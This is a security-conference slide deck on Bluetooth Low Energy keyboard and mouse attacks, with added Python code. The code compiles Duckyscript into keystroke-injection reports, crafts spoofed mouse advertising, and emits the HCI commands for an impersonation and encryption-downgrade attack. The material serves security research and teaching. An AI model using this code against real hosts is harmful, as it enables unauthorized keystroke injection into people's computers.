
Mike Ryan NSA Playset: Bluetooth Smart HITB Malaysia, October 16, 2014


NSA Playset: Bluetooth Smart

Mike Ryan, iSEC Partners

Hack In The Box Malaysia, October 16, 2014

A presentation in five acts


Standard Note

Bluetooth Smart == BLE


Act I

THE NSA PLAYSET


The NSA Playset

⇀ NSA ANT catalog
⇀ Sweet codenames!
  ⇁ DEITYBOUNCE
  ⇁ NIGHTSTAND
⇀ Playset codenames
  ⇁ TWILIGHTVEGETABLE
  ⇁ SLOTSCREAMER
  ⇁ DUCHESSRIDE


Bluetooth Capabilities

⇀ Ubertooth
⇀ Crackle
⇀ BlueZ


Capabilities: Ubertooth

⇀ Discovering undiscoverable devices
⇀ Rudimentary classic BT sniffing
⇀ Robust BLE sniffing
⇀ (WIP) BLE transmit


Capabilities: Crackle

⇀ Cracking BLE key exchange
⇀ Decrypting data

Needs to be paired with a sniffer, like Ubertooth


Capabilities: BlueZ

⇀ Fully functional BR/EDR (classic) and BLE stack
⇀ Able to act as master AND slave (BLE)
⇀ Multipurpose utilities: recon


Existing Capabilities

⇀ Not bad for zero effort!


ANT Catalog: Bluetooth

⇀ Even the NSA doesn't care about Bluetooth
  ⇁ Yeah, right
⇀ We don't have the full catalog
⇀ Ellisys
  ⇁ more like elli$y$ amirite

ABSENT?!


Implied Bluetooth Capabilities

⇀ Headset interception
⇀ Surveillance of movement (tracking)
⇀ Stack exploitation / RCE
⇀ Keyboards → Now we're talking!


Keyboards and Mice

⇀ Keystroke surveillance
⇀ Keystroke injection (BlueDucky?)


TINYALAMO

⇀ Keystroke injection!
⇀ Duckyscript!

DEMO
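What the demo does at the byte level, as an added example (this is not the TINYALAMO code from the talk): a Duckyscript fragment is compiled into the 8-byte boot keyboard input reports a BLE HID-over-GATT keyboard sends, and each report is wrapped in the ATT notification that carries it to the host. The US keyboard layout, the sample script and the characteristic handle 0x0020 are assumptions made for the example.

```python
# Added example, not the TINYALAMO code from the talk: compile a Duckyscript
# fragment into boot keyboard input reports and the ATT notifications that
# carry them over BLE. US layout assumed; the handle below is hypothetical.
import struct
from typing import List, Tuple, Union

# Modifier bit masks, byte 0 of the boot keyboard input report.
MOD_CTRL, MOD_SHIFT, MOD_ALT, MOD_GUI = 0x01, 0x02, 0x04, 0x08
RELEASE = bytes(8)  # all keys up

# HID usage IDs (Keyboard/Keypad page 0x07): char -> (usage, modifiers).
_USAGES = {}
for i, c in enumerate("abcdefghijklmnopqrstuvwxyz"):
    _USAGES[c] = (0x04 + i, 0)
    _USAGES[c.upper()] = (0x04 + i, MOD_SHIFT)
for i, c in enumerate("1234567890"):
    _USAGES[c] = (0x1E + i, 0)
for i, c in enumerate("!@#$%^&*()"):
    _USAGES[c] = (0x1E + i, MOD_SHIFT)
for plain, shifted, usage in [("\n", None, 0x28), ("\t", None, 0x2B), (" ", None, 0x2C),
                              ("-", "_", 0x2D), ("=", "+", 0x2E), ("[", "{", 0x2F),
                              ("]", "}", 0x30), ("\\", "|", 0x31), (";", ":", 0x33),
                              ("'", '"', 0x34), ("`", "~", 0x35), (",", "<", 0x36),
                              (".", ">", 0x37), ("/", "?", 0x38)]:
    _USAGES[plain] = (usage, 0)
    if shifted:
        _USAGES[shifted] = (usage, MOD_SHIFT)

# Named keys, usable alone ("ENTER") or after modifiers ("GUI r", "CTRL ALT DELETE").
_NAMED = {"ENTER": 0x28, "ESC": 0x29, "ESCAPE": 0x29, "BACKSPACE": 0x2A, "TAB": 0x2B,
          "SPACE": 0x2C, "CAPSLOCK": 0x39, "DELETE": 0x4C, "RIGHT": 0x4F, "LEFT": 0x50,
          "DOWN": 0x51, "UP": 0x52}
_NAMED.update({"F%d" % n: 0x3A + n - 1 for n in range(1, 13)})
_MODS = {"CTRL": MOD_CTRL, "CONTROL": MOD_CTRL, "SHIFT": MOD_SHIFT, "ALT": MOD_ALT,
         "GUI": MOD_GUI, "WINDOWS": MOD_GUI, "COMMAND": MOD_GUI}


def report(modifiers: int, *usages: int) -> bytes:
    """Boot keyboard input report: modifier byte, reserved byte, up to six usage IDs."""
    if len(usages) > 6:
        raise ValueError("boot report carries at most six simultaneous keys")
    return bytes([modifiers, 0x00, *usages]) + bytes(6 - len(usages))


def type_string(text: str) -> List[bytes]:
    """One press report and one release report per character."""
    out = []
    for ch in text:
        if ch not in _USAGES:
            raise ValueError("no US-layout usage for %r" % ch)
        usage, mod = _USAGES[ch]
        out += [report(mod, usage), RELEASE]
    return out


Step = Tuple[str, Union[bytes, int]]


def compile_duckyscript(script: str) -> List[Step]:
    """('report', bytes) steps to send in order, plus ('delay', ms) pauses."""
    steps: List[Step] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "STRING":
            steps += [("report", r) for r in type_string(arg)]
        elif cmd == "DELAY":
            steps.append(("delay", int(arg)))
        elif cmd in _MODS or cmd in _NAMED:
            mods, tokens = 0, [cmd] + arg.split()
            while tokens and tokens[0].upper() in _MODS:   # accumulate modifiers
                mods |= _MODS[tokens.pop(0).upper()]
            usage = 0
            if tokens:                                      # the key they apply to
                key = tokens[0]
                usage = _NAMED.get(key.upper()) or _USAGES[key][0]
            steps += [("report", report(mods, usage)), ("report", RELEASE)]
        else:
            raise ValueError("unsupported Duckyscript command: " + cmd)
    return steps


# Hypothetical handle of the Boot Keyboard Input Report characteristic (UUID 0x2A22)
# on the fake keyboard's GATT server; a real host learns it by service discovery.
BOOT_KBD_INPUT_HANDLE = 0x0020
ATT_HANDLE_VALUE_NTF = 0x1B


def att_notification(handle: int, value: bytes) -> bytes:
    """ATT Handle Value Notification PDU: opcode, handle (little-endian), value."""
    return struct.pack("<BH", ATT_HANDLE_VALUE_NTF, handle) + value


def notifications(script: str, handle: int = BOOT_KBD_INPUT_HANDLE) -> List[Union[bytes, int]]:
    """Everything the peripheral sends for the script; ints are delays in ms."""
    return [att_notification(handle, v) if kind == "report" else v
            for kind, v in compile_duckyscript(script)]


# Constructed sample payload: open the Run dialog and type "cmd".
SAMPLE = "REM constructed sample\nGUI r\nDELAY 500\nSTRING cmd\nENTER\n"

if __name__ == "__main__":
    for item in notifications(SAMPLE):
        print(item if isinstance(item, int) else item.hex())
```

The same report bytes work on USB, classic Bluetooth HID and HID over GATT, which is the point of "HID is HID is HID" later in the deck: only the transport framing (here an ATT notification) changes.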


What just happened?


Act II

BLE PRIMER


BLE in a nutshell

⇀ Master and slave
⇀ Advertising


Advertising Data

⇀ BD_ADDR: 48 bits
⇀ 16-bit Service UUIDs: 0x1812 (HID service)
⇀ Appearance: 962 (Mouse)
⇀ Complete Local Name: Bad Mouse
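The four fields above are what a scanner sees in the mouse's advertising payload. As an added example (not code from the talk), the following encodes them as AD structures and parses them back the way `hcitool lescan` or an Ubertooth would. Each AD structure is one length byte (covering type plus data), one AD type byte, then the data, and the whole AdvData field is at most 31 bytes. The flags value and the address classifier's inputs are assumptions made for the example.

```python
# Added example, not code from the talk: build and parse BLE advertising data
# (AD structures) for the "Bad Mouse" peripheral on the slide.
import struct
from typing import Dict, List

AD_FLAGS, AD_UUID16_COMPLETE, AD_COMPLETE_NAME, AD_APPEARANCE = 0x01, 0x03, 0x09, 0x19
FLAGS_LE_GENERAL_DISC, FLAGS_BR_EDR_NOT_SUPPORTED = 0x02, 0x04
UUID16_HID_SERVICE = 0x1812   # Human Interface Device service
APPEARANCE_MOUSE = 962        # 0x03C2 in the assigned numbers
MAX_ADV_DATA = 31


def ad_structure(ad_type: int, data: bytes) -> bytes:
    """length (type byte + data), AD type, data."""
    return bytes([len(data) + 1, ad_type]) + data


def build_adv_data(name: str, uuids16: List[int], appearance: int,
                   flags: int = FLAGS_LE_GENERAL_DISC | FLAGS_BR_EDR_NOT_SUPPORTED) -> bytes:
    adv = ad_structure(AD_FLAGS, bytes([flags]))
    adv += ad_structure(AD_UUID16_COMPLETE, b"".join(struct.pack("<H", u) for u in uuids16))
    adv += ad_structure(AD_APPEARANCE, struct.pack("<H", appearance))
    adv += ad_structure(AD_COMPLETE_NAME, name.encode("utf-8"))
    if len(adv) > MAX_ADV_DATA:
        raise ValueError("advertising data is %d bytes, limit is %d" % (len(adv), MAX_ADV_DATA))
    return adv


def parse_adv_data(adv: bytes) -> Dict[int, bytes]:
    """AD type -> data. Stops at zero padding; rejects a structure that runs past the end."""
    out: Dict[int, bytes] = {}
    i = 0
    while i < len(adv):
        length = adv[i]
        if length == 0:          # padding after the last structure
            break
        if i + 1 + length > len(adv):
            raise ValueError("AD structure at offset %d runs past end of data" % i)
        out[adv[i + 1]] = bytes(adv[i + 2:i + 1 + length])
        i += 1 + length
    return out


def describe(adv: bytes) -> dict:
    """The fields shown on the slide, decoded from raw AD bytes."""
    ads = parse_adv_data(adv)
    info: dict = {}
    if AD_FLAGS in ads:
        info["flags"] = ads[AD_FLAGS][0]
    if AD_UUID16_COMPLETE in ads:
        d = ads[AD_UUID16_COMPLETE]
        info["uuids16"] = list(struct.unpack("<%dH" % (len(d) // 2), d))
    if AD_APPEARANCE in ads:
        info["appearance"] = struct.unpack("<H", ads[AD_APPEARANCE])[0]
    if AD_COMPLETE_NAME in ads:
        info["name"] = ads[AD_COMPLETE_NAME].decode("utf-8", "replace")
    return info


def random_address_kind(addr: str) -> str:
    """Classify a random (TxAdd=1) BD_ADDR, written 'AA:BB:CC:DD:EE:FF', by its two top bits.
    Only a resolvable private address rotates; a static one tracks the device forever."""
    top = int(addr.split(":")[0], 16) >> 6
    return {0b11: "static", 0b10: "resolvable private",
            0b00: "non-resolvable private"}.get(top, "reserved")


if __name__ == "__main__":
    adv = build_adv_data("Bad Mouse", [UUID16_HID_SERVICE], APPEARANCE_MOUSE)
    print(adv.hex(), describe(adv))
```

The parser tolerates the zero padding a controller adds to fill the 31-byte field, but refuses a structure whose length byte points past the end of the data; a scanner that trusts the length byte blindly is the kind of stack-exploitation target the "Implied Bluetooth Capabilities" slide alludes to.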


BLE in a nutshell

⇀ Master and slave
⇀ Advertising
⇀ Link layer connections
⇀ Pairing and encryption
⇀ HID


Act III

TARGETS


Targets

OS must support HID over GATT
⇀ Android 4.4 (Bluedroid)
⇀ iOS 7/8 (iPad only)
⇀ Mac OS 10.9+
⇀ Linux / BlueZ 5 (Fedora 20, Arch, NOT Ubuntu)
⇀ Windows 8 and Windows Phone 8

Not supported: BB 10, Android < 4.4


Do BLE Keyboards Exist?

⇀ Yes, finally! (I think)
⇀ BLE mice totally exist

HID is HID is HID


HID Encryption

⇀ HID spec requires encryption
⇀ Link layer authenticated encryption
⇀ Pairing != Encryption


Act IV

BLE ATTACKS


Encryption Attacks

⇀ Crack encryption, recover key
⇀ Exploit implementation flaw
  ⇁ Encryption downgrade
  ⇁ Opportunistic downgrade
  ⇁ Forced re-pairing



Crack Encryption

⇀ Least invasive
⇀ Downside: Must observe pairing
⇀ Bonus: keystroke surveillance



Opportunistic Downgrade

⇀ More invasive
⇀ Distinguishable from legit keyboard
⇀ Relies on OS bugs



Forced Unpairing

⇀ Most invasive
⇀ Least broadly applicable


Naming Names

⇀ Not yet!
⇀ Two out of five OSes are vulnerable


Act V

BUILDING THE ATTACKS


Ingredients

⇀ Regular Bluetooth dongle
⇀ HCI_USER_SOCKET
⇀ Scapy
⇀ PyBT
⇀ Wee bit of Python glue
⇀ Ubertooth (optional)


HCI and HCI_USER_SOCKET

⇀ All Bluetooth dongles speak HCI
⇀ You can sniff this with recent Wireshark
⇀ You can send totally illegal stuff this way
⇀ HCI_USER_SOCKET – speak HCI from userspace
  ⇁ Linux 3.13 – all recent distros!


Scapy

⇀ Framework for constructing packets
⇀ Added extensive Bluetooth support
  ⇁ HCI, L2CAP, SM, ATT, GATT
  ⇁ s = BluetoothUserSocket()


PyBT

⇀ I accidentally a Bluetooth stack
⇀ BLE, SM (pairing), key management
⇀ GATT client and server
⇀ Roles: Central and Peripheral
⇀ central = LE_Central()
⇀ periph = LE_Peripheral()


Ubertooth

⇀ Pull host and HID device addresses out of the air
⇀ Nobody uses BLE private addresses correctly
⇀ Nobody
⇀ Not always necessary (hcitool lescan)


Putting it all together

⇀ Ubertooth grabs BD_ADDR
⇀ Launch PyBT
  ⇁ Talks to dongle via HCI_USER_SOCKET
  ⇁ Builds packets with Scapy
⇀ Advertise with address of mouse
⇀ Wait for connection, send “no key” message
⇀ Profit!
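The steps above, expressed as the raw HCI traffic a user-space stack exchanges with the dongle. This is an added example, not PyBT or Scapy code: it builds the H4-framed LE controller commands that start advertising under the mouse's address and decodes the events that come back, answering the host's encryption start with an LTK request negative reply, the "no key" message (the controller then rejects LL_ENC_REQ with error 0x06, PIN or Key Missing, and the link stays unencrypted). The socket itself is not opened here; these are the bytes you would write to an HCI user channel (HCI_CHANNEL_USER, Linux 3.13+), which is what scapy's BluetoothUserSocket wraps. Assumptions: the spoofed address is loaded as a random address, since standard HCI offers no way to change a controller's public address; the addresses, connection handle, EDIV and Rand in the sample events are constructed; and whether the host then falls back to unencrypted HID is the OS bug the previous slides refer to, not something this code can force.

```python
# Added example, not PyBT/Scapy code: HCI command framing for advertising as
# the mouse and refusing the LTK when the host starts encryption.
# All addresses, handles and key material below are constructed.
import struct
from typing import Dict, List, Optional, Tuple

H4_COMMAND, H4_EVENT = 0x01, 0x04
OGF_LE_CONTROLLER = 0x08
OCF_LE_SET_RANDOM_ADDRESS, OCF_LE_SET_ADV_PARAMS = 0x0005, 0x0006
OCF_LE_SET_ADV_DATA, OCF_LE_SET_ADV_ENABLE = 0x0008, 0x000A
OCF_LE_LTK_REQUEST_NEGATIVE_REPLY = 0x001B
EVT_LE_META = 0x3E
SUBEVT_LE_CONNECTION_COMPLETE, SUBEVT_LE_LTK_REQUEST = 0x01, 0x05


def le_command(ocf: int, params: bytes = b"") -> bytes:
    """H4 command packet: 0x01, opcode (OGF<<10 | OCF, little-endian), length, params."""
    return struct.pack("<BHB", H4_COMMAND, (OGF_LE_CONTROLLER << 10) | ocf, len(params)) + params


def bdaddr_bytes(addr: str) -> bytes:
    """'AA:BB:CC:DD:EE:FF' -> the 6 bytes HCI wants (least significant first)."""
    return bytes(int(x, 16) for x in addr.split(":"))[::-1]


def bdaddr_str(raw: bytes) -> str:
    return ":".join("%02X" % b for b in raw[::-1])


def le_set_random_address(addr: str) -> bytes:
    return le_command(OCF_LE_SET_RANDOM_ADDRESS, bdaddr_bytes(addr))


def le_set_adv_params(interval_ms: float = 100.0) -> bytes:
    # min/max interval in 0.625 ms units, ADV_IND (0x00), own address type random
    # (0x01), no directed peer, all three advertising channels (0x07), no filter.
    units = int(interval_ms / 0.625)
    params = struct.pack("<HHBBB6sBB", units, units, 0x00, 0x01, 0x00, bytes(6), 0x07, 0x00)
    return le_command(OCF_LE_SET_ADV_PARAMS, params)


def le_set_adv_data(adv: bytes) -> bytes:
    if len(adv) > 31:
        raise ValueError("advertising data limited to 31 bytes")
    # Fixed-size parameter block: significant length, then data padded to 31 bytes.
    return le_command(OCF_LE_SET_ADV_DATA, bytes([len(adv)]) + adv.ljust(31, b"\x00"))


def le_set_adv_enable(enable: bool) -> bytes:
    return le_command(OCF_LE_SET_ADV_ENABLE, bytes([int(enable)]))


def le_ltk_request_negative_reply(conn_handle: int) -> bytes:
    """The "no key" message: we claim to have no LTK for the EDIV/Rand the host sent."""
    return le_command(OCF_LE_LTK_REQUEST_NEGATIVE_REPLY, struct.pack("<H", conn_handle))


def impersonate(mouse_addr: str, adv_data: bytes) -> List[bytes]:
    """Commands, in order, to start advertising as the mouse."""
    return [le_set_random_address(mouse_addr), le_set_adv_params(),
            le_set_adv_data(adv_data), le_set_adv_enable(True)]


def parse_le_meta_event(packet: bytes) -> Optional[Tuple[int, Dict[str, object]]]:
    """Decode an H4 event packet; (subevent, fields) for LE Meta events, else None."""
    if len(packet) < 3 or packet[0] != H4_EVENT:
        raise ValueError("not an H4 event packet")
    code, plen, body = packet[1], packet[2], packet[3:]
    if code != EVT_LE_META or len(body) != plen or plen < 1:
        return None
    sub = body[0]
    if sub == SUBEVT_LE_CONNECTION_COMPLETE and plen >= 19:
        status, handle, role, peer_type = struct.unpack_from("<BHBB", body, 1)
        return sub, {"status": status, "handle": handle, "role": role,
                     "peer_type": peer_type, "peer": bdaddr_str(body[6:12])}
    if sub == SUBEVT_LE_LTK_REQUEST and plen >= 13:
        handle, rand, ediv = struct.unpack_from("<HQH", body, 1)
        return sub, {"handle": handle, "rand": rand, "ediv": ediv}
    return sub, {}


def on_event(packet: bytes) -> Optional[bytes]:
    """Reply to write back for an incoming event: refuse the LTK, otherwise nothing."""
    parsed = parse_le_meta_event(packet)
    if parsed and parsed[0] == SUBEVT_LE_LTK_REQUEST:
        return le_ltk_request_negative_reply(int(parsed[1]["handle"]))
    return None


# Constructed samples: the host connects (we are slave, handle 0x0040), then
# starts encryption with the bonded mouse's EDIV/Rand, which the dongle
# reports to us as an LE Long Term Key Request event.
SAMPLE_CONN_COMPLETE = (bytes([H4_EVENT, EVT_LE_META, 19, SUBEVT_LE_CONNECTION_COMPLETE, 0x00])
                        + struct.pack("<HBB", 0x0040, 0x01, 0x00) + bdaddr_bytes("00:11:22:33:44:55")
                        + struct.pack("<HHHB", 24, 0, 200, 0))
SAMPLE_LTK_REQUEST = (bytes([H4_EVENT, EVT_LE_META, 13, SUBEVT_LE_LTK_REQUEST])
                      + struct.pack("<HQH", 0x0040, 0x1122334455667788, 0x0001))

if __name__ == "__main__":
    for cmd in impersonate("C4:AA:BB:CC:DD:EE", bytes.fromhex("020106")):
        print("->", cmd.hex())
    for evt in (SAMPLE_CONN_COMPLETE, SAMPLE_LTK_REQUEST):
        print("<-", evt.hex(), "reply:", (on_event(evt) or b"").hex())
```

The LTK request event carries the EDIV and Rand the host stored at bonding time; a stack that actually held the mouse's LTK would answer with the positive reply and the link would encrypt. Refusing instead is exactly what distinguishes this from a legitimate keyboard, as the "Opportunistic Downgrade" slide notes.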


URL ME BRO

⇀ https://github.com/mikeryan/PyBT
⇀ https://bitbucket.org/mikeryan1/scapy
⇀ Older stuff
  ⇁ https://github.com/mikeryan/crackle
  ⇁ https://github.com/greatscottgadgets/ubertooth


Thanks

⇀ Marcel Holtmann
⇀ Mike Ossmann / Dominic Spill / Ubertooth team
⇀ Marcel Holtmann
⇀ Hack In The Box!


Thank You

Mike Ryan

@mpeg4codec

[email protected]

https://lacklustre.net/